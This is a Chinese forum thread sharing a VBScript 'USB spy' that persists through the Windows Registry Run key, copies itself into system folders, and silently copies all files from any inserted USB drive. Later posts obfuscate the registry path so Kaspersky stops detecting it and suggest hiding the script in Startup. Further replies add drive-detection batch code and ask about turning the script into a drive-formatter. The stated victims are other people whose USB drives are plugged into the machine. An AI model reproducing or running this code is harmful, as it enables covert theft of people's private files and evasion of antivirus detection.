Board logo

标题: [原创]U盘偷窥者,监视U盘一插入就COPY [打印本页]
作者: zhoushijay     时间: 2007-5-14 09:43    标题: [原创]U盘偷窥者,监视U盘一插入就COPY
请把代码中U盘的盘符(H:\)改成自己电脑U盘的盘符
代码已经过证实会被卡吧认为是病毒, -__-!


'---------------------------------U盘偷窥者.vbs-------------------------------------
set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\USBgetter","C:\Program Files\U盘偷窥者.vbs"
if fso.folderexists("c:\usb")=false then
fso.createfolder("c:\usb")
fso.copyfile "U盘偷窥者.vbs","C:\Program Files\"
end if
do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
'-------------------------------------------------------------------------------------
作者: zhoushijay     时间: 2007-5-14 09:52
经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉
作者: baomaboy     时间: 2007-5-14 09:55
没通用性,要改成自动检测U盘。
作者: baomaboy     时间: 2007-5-14 09:57
Originally posted by zhoushijay at 2007-5-14 09:52:
经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉


连自启动也取消,那还叫U盘偷窥者吗,什么都要自己改。
作者: zhoushijay     时间: 2007-5-14 09:57
宝马兄有什么办法可以自动检测盘符吗?

不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了
作者: baomaboy     时间: 2007-5-14 10:09
把它的马甲改成背心穿,至少我的卡巴已经认不出这是原来那个毒了,不知道你用的什么杀毒软件,有效果吗?


'---------------------------------U盘偷窥者.vbs-------------------------------------

set fso=createobject("scripting.filesystemobject")

set ws=createobject("wscript.shell")

on error resume next

aaa="HKEY_CURRENT_USER\Software\Micr"

bbb="osoft\Windows\Curr"

ccc="entVers"

ddd="ion\Ru"

eee="n\USBgetter"

ws.regwrite aaa&bbb&ccc&ddd&eee,"C:\Program Files\U盘偷窥者.vbs"

if fso.folderexists("c:\usb")=false then

fso.createfolder("c:\usb")

fso.copyfile "U盘偷窥者.vbs","C:\Program Files\"

end if

do

wscript.sleep 1000

if fso.driveexists("H:\") then

fso.copyfile "H:\*","c:\usb\"

fso.copyfolder "H:\*","c:\usb\"

wscript.sleep 20000

end if

loop

'-------------------------------------------------------------------------------------
作者: baomaboy     时间: 2007-5-14 10:11
Originally posted by zhoushijay at 2007-5-14 09:57:
宝马兄有什么办法可以自动检测盘符吗?

不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了


好像在论坛看到过资料,你自己搜一下
作者: zhoushijay     时间: 2007-5-14 10:14
厉害咯,我的卡吧也认不出来了,这么笨的!
作者: bob1989     时间: 2007-5-14 13:56
加在注册表里很容易被人发现的``还是加到开始的启动里把!
作者: zhoushijay     时间: 2007-5-14 17:46
很多人都误会了,其实这个程序装在你电脑上,你是使用者,在你电脑上使用U盘的人才是受害者,这点必须搞清楚,既然你是使用者,你当然知道这个程序装在哪里,所以不存在发现不发现的问题.
作者: ebfok     时间: 2007-5-14 19:20
好是好,就是进程中多了个Wscript,7M多呢,不知道vbs有没有更好的常驻内存的办法
作者: zhoushijay     时间: 2007-5-14 19:51
我这只有2M啊,一点都不影响,这是目前我在用的修改后的代码


set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next

if fso.folderexists("c:\usb")=false then
aaa="HKEY_CURRENT_USER\Software\Micr"
bbb="osoft\Windows\Curr"
ccc="entVers"
ddd="ion\Ru"
eee="n\USBgetter"
ws.regwrite aaa&bbb&ccc&ddd&eee,"C:\WINDOWS\system32\usbgeter.vbs"
fso.createfolder("c:\usb")
fso.copyfile "usbgeter.vbs","C:\WINDOWS\system32\"
end if

do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
作者: qq82015930     时间: 2007-10-9 16:11
记号
作者: pooloo     时间: 2007-10-10 08:17
恩,学习中……我也给一段:
echo 正在检测可移动设备
setlocal enabledelayedexpansion
for /f "skip=1 tokens=1,2 delims=\" %%i in ('fsutil fsinfo drives^|find /v ""') do (
set drv_lst=%%i
set drv_lst=!drv_lst:~-2!
for %%udisk in (!drv_lst!) do (
fsutil fsinfo drivetype %%udisk | findstr "移动" >nul 2>nul && if /i not "%%udisk"=="A:" (
set drive=%%udisk
echo U盘盘符是%%udisk 。
echo 显示U盘隐藏文件……
!drive!
cd\
attrib /s/d -r -h -s -a *.* >nul 2>nul
)
)
)
cls
echo 检测完毕!没有检测到U盘存在!请手工输入U盘盘符
pause

Last edited by pooloo on 2007-10-10 at 08:22 AM ]
作者: buddiyar     时间: 2010-2-20 21:34
做个记号 呵呵
谢谢
作者: Michale     时间: 2010-2-22 14:15
晕 我这边测试了 竟然没反应
作者: zsbjxy     时间: 2010-2-22 17:45
怎么才能变成格式化U盘?
作者: zsbjxy     时间: 2010-5-9 00:17
学习中
作者: yonghu111     时间: 2010-5-10 13:24
学习了!!!
作者: 422904z     时间: 2010-5-12 21:50
拜谢